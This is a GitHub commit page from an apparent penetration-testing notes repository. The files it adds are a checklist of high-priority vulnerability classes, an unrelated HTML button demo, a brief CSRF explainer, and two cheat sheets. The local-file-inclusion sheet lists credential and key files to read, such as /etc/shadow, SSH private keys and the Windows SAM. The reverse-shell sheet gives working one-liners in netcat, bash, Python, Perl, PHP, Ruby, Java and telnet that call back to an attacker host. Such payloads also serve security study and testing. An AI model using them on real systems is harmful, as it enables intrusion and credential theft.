-
-
Notifications
You must be signed in to change notification settings - Fork 35
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Tikam02
committed
Sep 2, 2019
1 parent
0daeca1
commit a390a08
Showing
94 changed files
with
948 additions
and
0 deletions.
There are no files selected for viewing
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
* [X] [P1] Server Security Misconfiguration Using Default Credentials | ||
|
||
:ballot_box_with_check: P1 Server-Side Injection File Inclusion Local | ||
|
||
:ballot_box_with_check: P1 Server-Side Injection Remote Code Execution (RCE) | ||
|
||
:ballot_box_with_check: P1 Server-Side Injection SQL Injection | ||
|
||
:ballot_box_with_check: P1 Server-Side Injection XML External Entity Injection (XXE) | ||
|
||
:ballot_box_with_check: P1 Broken Authentication and Session Management Authentication Bypass | ||
|
||
:ballot_box_with_check: P1 Sensitive Data Exposure Critically Sensitive Data Password Disclosure | ||
|
||
:ballot_box_with_check: P1 Sensitive Data Exposure Critically Sensitive Data Private API Keys | ||
|
||
:ballot_box_with_check: P1 Insecure OS/Firmware Command Injection | ||
|
||
:ballot_box_with_check: P1 Insecure OS/Firmware Hardcoded Password Privileged User | ||
|
||
:ballot_box_with_check: P1 Broken Cryptography Cryptographic Flaw Incorrect Usage | ||
|
||
:ballot_box_with_check: P1 Automotive Security Misconfiguration Infotainment PII Leakage | ||
|
||
:ballot_box_with_check: P1 Automotive Security Misconfiguration RF Hub Key Fob Cloning | ||
|
||
|
||
<!DOCTYPE html> | ||
<html> | ||
<head> | ||
<style> | ||
.button { | ||
background-color: #4CAF50; /* Green */ | ||
border: none; | ||
color: white; | ||
padding: 15px 32px; | ||
text-align: center; | ||
text-decoration: none; | ||
display: inline-block; | ||
font-size: 16px; | ||
margin: 4px 2px; | ||
cursor: pointer; | ||
} | ||
|
||
.button2 {background-color: #008CBA;} /* Blue */ | ||
.button3 {background-color: #f44336;} /* Red */ | ||
.button4 {background-color: #e7e7e7; color: black;} /* Gray */ | ||
.button5 {background-color: #555555;} /* Black */ | ||
</style> | ||
</head> | ||
<body> | ||
|
||
<h2>Button Colors</h2> | ||
<p>Change the background color of a button with the background-color property:</p> | ||
|
||
<button class="button">Green</button><br> | ||
<button class="button button2">Blue</button> | ||
<button class="button button3">Red</button> | ||
<button class="button button4">Gray</button> | ||
<button class="button button5">Black</button> | ||
|
||
</body> | ||
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,7 @@ | ||
### CSRF | ||
***** | ||
|
||
CSRF (Cross site request forgery) is the vulnerability that tricks the user to submit the malicious request if there is no implementation of the Anti-CSRF tokens in the forms or site. When implemented your website https://vulnerables.com will include a random generated number or token to every page which is impossible to guess by the attacker so https://vulnerables.com will include it when they serve it to you. It differs each time they serve any page to anybody so attacker won’t be able to generate a valid request because of the wrong token. | ||
|
||
### What is CSRF attack? | ||
CSRF is an attack that tricks the victim to send a malicious request this request can change the victim information like Email, Username, Passwords and etc… |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
# LFI Cheat Sheet | ||
|
||
[LINK](https://xapax.gitbooks.io/security/content/local_file_inclusion.html) | ||
### Useful LFI files | ||
../../../../../etc/passwd%00 | ||
|
||
### Linux: | ||
/etc/passwd | ||
/etc/shadow | ||
/etc/issue | ||
/etc/group | ||
/etc/hostname | ||
/etc/ssh/ssh_config | ||
/etc/ssh/sshd_config | ||
/root/.ssh/id_rsa | ||
/root/.ssh/authorized_keys | ||
/home/user/.ssh/authorized_keys | ||
/home/user/.ssh/id_rsa | ||
|
||
### Apache: | ||
#### Configuration Files: | ||
/etc/apache2/apache2.conf | ||
/usr/local/etc/apache2/httpd.conf | ||
/etc/httpd/conf/httpd.conf | ||
|
||
### Log Files: | ||
### Red Hat/CentOS/Fedora Linux- /var/log/httpd/access_log | ||
### Debian/Ubuntu- /var/log/apache2/access.log | ||
### FreeBSD- /var/log/httpd-access.log | ||
|
||
### Generic: | ||
/var/log/apache/access.log | ||
/var/log/apache/error.log | ||
/var/log/apache2/access.log | ||
/var/log/apache/error.log | ||
|
||
### MySql: | ||
/var/lib/mysql/mysql/user.frm | ||
/var/lib/mysql/mysql/user.MYD | ||
/var/lib/mysql/mysql/user.MYI | ||
|
||
### Windows: | ||
/boot.ini | ||
/autoexec.bat | ||
/windows/system32/drivers/etc/hosts | ||
/windows/repair/SAM | ||
/windows/panther/unattended.xml | ||
/windows/panther/unattend/unattended.xml |
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,54 @@ | ||
# Reverse Shell Cheat Sheet | ||
*********** | ||
### Netcat: | ||
nc 192.168.1.10 443 -e /bin/bash | ||
|
||
/bin/sh | nc 192.168.1.10 443 | ||
|
||
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.10 443 0/tmp/p | ||
|
||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f | ||
|
||
### Bash: | ||
bash -i >& /dev/tcp/192.168.1.10/443 0>&1 | ||
|
||
/bin/bash -i > /dev/tcp/192.168.1.10/443 0<&1 2>&1 | ||
|
||
0<&196;exec 196<>/dev/tcp/192.168.1.10/443; sh <&196 >&196 2>&196 | ||
|
||
exec 5<>/dev/tcp/192.168.1.10/443 | ||
cat <&5 | while read line; do $line 2>&5 >&5; done | ||
|
||
exec 5<>/dev/tcp/192.168.1.10/443 | ||
cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done | ||
|
||
### Python: | ||
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.10”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’ | ||
|
||
### Perl: | ||
*nix: | ||
perl -e ‘use Socket;$i=”192.168.1.10″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ | ||
|
||
### Windows: | ||
perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”192.168.1.10-IP:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ | ||
|
||
perl -e ‘use Socket;$i=”192.168.1.10″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ | ||
|
||
### PHP: | ||
php -r ‘$sock=fsockopen(“192.168.1.10”,443);exec(“/bin/sh -i <&3 >&3 2>&3”);’ | ||
|
||
### Ruby: | ||
ruby -rsocket -e’f=TCPSocket.open(“192.168.1.10”,443).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’ | ||
|
||
### Windows | ||
ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’ | ||
|
||
### Java: | ||
r = Runtime.getRuntime() | ||
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.1.10/443;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[]) | ||
p.waitFor() | ||
|
||
### Telnet: | ||
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.10 443 0/tmp/p | ||
|
||
telnet 192.168.1.10 443 | /bin/bash | telnet 192.168.1.10 443 |
Oops, something went wrong.